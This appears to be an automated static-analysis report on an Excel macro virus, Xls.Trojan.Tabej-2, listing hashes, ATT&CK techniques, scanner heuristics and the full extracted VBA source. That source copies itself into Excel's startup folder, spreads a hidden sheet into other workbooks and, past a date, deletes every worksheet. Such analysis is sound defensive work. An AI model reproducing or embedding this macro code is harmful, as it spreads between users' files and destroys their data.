Xls.Trojan.Tabej-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 5e30528498f6ff13…

MALICIOUS

Office (OLE)

Size: 33.0 KB
Created: 1998-08-04 05:09:28
First seen: 2012-06-14
MD5: 3ebf12f7815206555c5f3514e74ae914
SHA-1: f8f701c3cfe5c71ae9af8d9d3938d4154dcccf9a
SHA-256: 5e30528498f6ff13c6cacd28bec4b7464822a400543c44b787a59c3ac37f5546
Risk Score: 220

Malware Insights

Xls.Trojan.Tabej-2 · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The presence of Auto_Open and Auto_Close VBA macros, along with ClamAV detections for 'Xls.Trojan.Tabej-2', strongly indicates malicious intent. The Auto_Open macro attempts to save a copy of itself as 'tabej.xls' in the startup path, suggesting an attempt at persistence. The Auto_Close macro also contains logic that could be used for cleanup or further execution.

Heuristics (4)

  • ClamAV: Xls.Trojan.Tabej-2 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Trojan.Tabej-2
  • VBA macros detected [medium, 2 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Auto_Open macro [high] (OLE_VBA_AUTO)
    Auto_Open macro
  • Auto_Close macro [high] (OLE_VBA_AUTOCLOSE)
    Auto_Close macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1771 bytes
SHA-256: b6164b7b7862400fad982a538d45ecdded47bbe7076789dfed776b06d34e4b56
Detection (ClamAV): Xls.Trojan.Tabej-2
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script)

Attribute VB_Name = "tabej"

Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = ""
If Windows(1).Caption = "tabej.xls" Then Workbooks.Add
s$ = Application.StartupPath & "\" & "tabej.xls"
d$ = Dir(s$)
If Not d$ = "tabej.xls" Then rx
Application.OnSheetActivate = "inf"
End Sub
Sub rx()
Attribute rx.VB_ProcData.VB_Invoke_Func = " \n14"
Application.ScreenUpdating = False
cd$ = CurDir()
ChDir Application.StartupPath
ActiveWorkbook.SaveAs filename:=Application.StartupPath & "/" & "tabej.xls"
ActiveWindow.Visible = False
ChDir cd$
Application.ScreenUpdating = True
End Sub
Sub inf()
Attribute inf.VB_ProcData.VB_Invoke_Func = " \n14"
dt = CSng(Date)
For x = 1 To ActiveWorkbook.Sheets.Count
If ActiveWorkbook.Sheets(x).Name = "tabej" Then
If ActiveWorkbook.Name <> ThisWorkbook.Name Then
If dt > 36016 Then
Application.DisplayAlerts = False
ActiveWorkbook.Sheets("tabej").Delete
Exit Sub
Application.DisplayAlerts = True
End If
End If
Exit Sub
End If
Next
Application.ScreenUpdating = False
ThisWorkbook.Sheets("tabej").Copy before:=ActiveWorkbook.Sheets(1)
ActiveWorkbook.Sheets("tabej").Visible = False
Application.ScreenUpdating = True
End Sub
Sub auto_close()
Attribute auto_close.VB_ProcData.VB_Invoke_Func = " \n14"
dt = CSng(Date)
If Not ActiveWorkbook Is Nothing Then
If dt > 36015 Then
If Worksheets.Count > 0 Then
Application.ScreenUpdating = False
Application.DisplayAlerts = False
Worksheets.Add.Move after:=Worksheets(Worksheets.Count)
For x = 1 To Worksheets.Count - 1
Worksheets(1).Delete
Next
ThisWorkbook.Save
End If
End If
End If
Application.DisplayAlerts = True
If ThisWorkbook.Name = "tabej" Then Application.OnSheetActivate = ""
End Sub